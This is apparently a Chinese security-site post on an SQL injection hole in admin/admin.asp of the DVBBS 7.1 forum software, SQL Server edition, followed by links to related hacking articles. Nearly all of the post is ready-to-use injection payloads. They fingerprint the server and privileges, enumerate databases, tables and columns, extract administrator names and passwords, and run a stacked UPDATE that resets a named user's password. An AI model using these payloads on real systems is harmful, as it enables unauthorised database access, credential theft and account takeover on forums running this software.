DVBBS7.1 SQL版 跨库漏洞

所属分类: 实用技巧 / 漏洞研究 阅读数: 1571
收藏 0 赞 0 分享
漏洞测试环境:DVBBS7.1 SQL 

受影响文件 
admin/admin.asp 
..... 

漏洞利用 

(select @@version)>0 获得Windows的版本号 
and user_name()='dbo' 判断当前系统的连接用户是不是sa 
(select user_name())>0 爆当前系统的连接用户 
(select db_name())>0 得到当前连接的数据库 
(select IS_MEMBER('db_owner')) --查询数据库当前用户权限 

(select count(*) from master.dbo.sysdatabases where name>1 and dbid=7) ---查询所有数据库名 
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U') --查询数据库表名 
(select top 1 name from JxSoufun.dbo.sysobjects where xtype='U' and name not in ('web_Admin')) --查询数据库所有表名 
(select count(*) from JxSoufun.dbo.sysobjects where xtype='U' and name='web_Admin' and uid>(str(id))) --查询表名ID 
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048) --查询字段名 
(select top 1 name from JxSoufun.dbo.syscolumns where id=1125579048 and name not in('adminname')) --查询所有字段名 
(select count(*) from JxSoufun.dbo.web_Admin where AdminName>1) -查询用户 
(select count(*) from JxSoufun.dbo.web_Admin where Adminpwd>1 and username='bluefire') -查询用户bluefire密码 
;update JxSoufun.dbo.Agency_User set userpwd='965eb72c92a549dd' where username='mthfc';--  
更多精彩内容其他人还在看

悬念音乐程序安装程序写马(图)

悬念音乐程序安装程序写马(图)
收藏 0 赞 0 分享

为什么经常被网络入侵?探究原因

为什么经常被网络入侵?探究原因
收藏 0 赞 0 分享

黑客之门的魅力:感染与加载(图)

黑客之门的魅力:感染与加载(图)
收藏 0 赞 0 分享

诱人视频请君入瓮 解析RealPlayer溢出漏洞

诱人视频请君入瓮 解析RealPlayer溢出漏洞
收藏 0 赞 0 分享

漏洞漫舞的飞骋

漏洞漫舞的飞骋
收藏 0 赞 0 分享

穷追猛打:破译Foxmail“密码天书”

穷追猛打:破译Foxmail“密码天书”
收藏 0 赞 0 分享

BBSXP漏洞再探究

BBSXP漏洞再探究
收藏 0 赞 0 分享

安全技术—RSA公钥密码体制安全性分析

安全技术—RSA公钥密码体制安全性分析
收藏 0 赞 0 分享

蜜罐技术:消除防火墙局限和脆弱

蜜罐技术:消除防火墙局限和脆弱
收藏 0 赞 0 分享

跨站脚本说明

跨站脚本说明
收藏 0 赞 0 分享
查看更多